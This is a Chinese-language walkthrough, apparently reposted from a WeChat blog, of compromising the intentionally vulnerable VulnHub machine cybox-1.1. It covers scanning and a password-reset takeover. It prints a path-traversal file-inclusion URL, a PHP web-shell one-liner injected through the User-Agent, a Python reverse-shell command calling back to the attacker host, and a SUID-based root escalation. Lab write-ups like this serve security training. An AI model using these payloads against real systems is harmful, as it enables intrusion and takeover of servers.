vulnhub之cybox-1.1的实践

admin 2022年8月15日21:07:18安全文章评论4 views1928字阅读6分25秒阅读模式

今天实践的是vulnhub的cybox-1.1镜像,

下载地址,https://download.vulnhub.com/cybox/cybox-1.1.ova,

用workstation导入成功,直接就看到了地址,省的做地址扫描了,

vulnhub之cybox-1.1的实践

进行端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.58.144,

vulnhub之cybox-1.1的实践

看到靶机有不少服务,把域名cybox.company跟地址的对应记录添加到etc/hosts文件中,然后做更多域名的发现,

sudo apt install seclists,
sudo gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u cybox.company,

vulnhub之cybox-1.1的实践

访问register域名的页面注册个新账号,gohacker,

vulnhub之cybox-1.1的实践

再访问monitor域名的页面同样注册新账号,gohacker,

vulnhub之cybox-1.1的实践

然后再重置密码,

vulnhub之cybox-1.1的实践

webmail域名这边页面下就收到了重置密码的链接,

vulnhub之cybox-1.1的实践

把重置密码链接里的邮箱改成admin的,这样就成功改了admin的密码,

vulnhub之cybox-1.1的实践

就可以用admin进行登录了,

vulnhub之cybox-1.1的实践

查看Admin panel,

vulnhub之cybox-1.1的实践

再查看页面源码,

vulnhub之cybox-1.1的实践

发现了文件包含漏洞的提示,styles.php?style=general,

尝试查看密码文件,http://monitor.cybox.company/admin/styles.php?style=../../../../../../../../../../etc/passwd%00,

vulnhub之cybox-1.1的实践

又从ftp域名的页面找到了命令注入的漏洞,

vulnhub之cybox-1.1的实践

通过burp suite向useragent里注入一句话木马,

<?php system($_GET['cmd']); ?>,

vulnhub之cybox-1.1的实践

猜测日志文件是/opt/bitnami/apache2/logs/access_log,

验证一句话木马,

http://monitor.cybox.company/admin/styles.php?style=../../../../../../../../../../opt/bitnami/apache2/logs/access_log%00&cmd=ls,

vulnhub之cybox-1.1的实践

构造一个反弹shell命令,

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.58.131",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);',

kali攻击机这边开一个反弹shell监听,sudo nc -nvlp 443,

访问url触发反弹shell,

http://monitor.cybox.company/admin/styles.php?style=../../../../../../../../../../opt/bitnami/apache2/logs/access_log%00&cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.58.131",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);',

vulnhub之cybox-1.1的实践

不是root,需要提权,

先python -c 'import pty;pty.spawn("/bin/bash")'转成交换式shell,

find / -perm -4000 2>/dev/null查找root权限的应用,

vulnhub之cybox-1.1的实践

发现了/opt/registerlauncher,

strings /opt/registerlauncher看到背后是/opt/register程序,

strings /opt/register看到这个程序的内容,能够创建系统账户,

vulnhub之cybox-1.1的实践

/opt/registerlauncher sudo创建一个叫sudo的账户,

su sudo切到sudo账户,sudo -l确认有/bin/bash的执行权限,

sudo /bin/bash拿到新的shell,id确认是root,

vulnhub之cybox-1.1的实践

原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之cybox-1.1的实践

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年8月15日21:07:18
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  vulnhub之cybox-1.1的实践 http://cn-sec.com/archives/1236626.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: